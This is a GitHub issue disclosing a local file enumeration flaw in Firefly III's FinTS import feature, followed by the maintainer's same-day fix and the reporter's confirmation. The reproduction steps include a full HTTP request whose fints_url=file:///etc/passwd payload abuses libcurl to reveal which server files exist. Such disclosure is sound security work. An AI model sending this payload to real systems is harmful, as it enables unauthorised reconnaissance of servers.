Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Local file enumeration vulnerability. #2367

Closed
0x2500 opened this issue Aug 2, 2019 · 2 comments
Closed

Local file enumeration vulnerability. #2367

0x2500 opened this issue Aug 2, 2019 · 2 comments
Labels
bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release).

Comments

@0x2500
Copy link

0x2500 commented Aug 2, 2019

Bug description
Current version of Firefly III Version 4.7.17.3 is vulnerable to local files enumeration.

Steps to reproduce

  1. Visit
import/create/fints
  1. Send that request:
POST /import/job/configuration/[unique string here, visit link above to get it] HTTP/1.1
Host: Your-Host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Cookie: ...

_token=[your token]&fints_url=file:///etc/passwd&fints_port=443&fints_bank_code=1&fints_username=1&fints_password=1&apply_rules=1

You will be redirected to http://your-host/import/job/configuration/[token] where you can see

 "An error occurred while trying to connecting to your bank. Please make sure that all the data you entered is correct. Original error message: Bad response with status code 0".

Send request above again with "fints_url=file:///etc/something-that-do-not-exist", you will see

 "An error occurred while trying to connecting to your bank. Please make sure that all the data you entered is correct. Original error message: Failed connection to file:///etc/something-that-do-not-exist: Couldn't open file /etc/something-that-do-not-exist".
  1. Error codes are different, and malicious attacker can use it to gain information about local file system, enumerate files and paths, bruteforce file structure. That issue appeared because you use libcurl, without proper protocol sanitizing.
@JC5 JC5 added bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release). labels Aug 2, 2019
@JC5 JC5 closed this as completed in e80d616 Aug 2, 2019
@JC5
Copy link
Member

JC5 commented Aug 2, 2019

Should be fixed, if you could verify I would be grateful.

@JC5 JC5 reopened this Aug 2, 2019
@0x2500
Copy link
Author

0x2500 commented Aug 2, 2019

Fixed.

@0x2500 0x2500 closed this as completed Aug 2, 2019
@lock lock bot locked as resolved and limited conversation to collaborators Jan 19, 2020
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release).
Projects
None yet
Development

No branches or pull requests

2 participants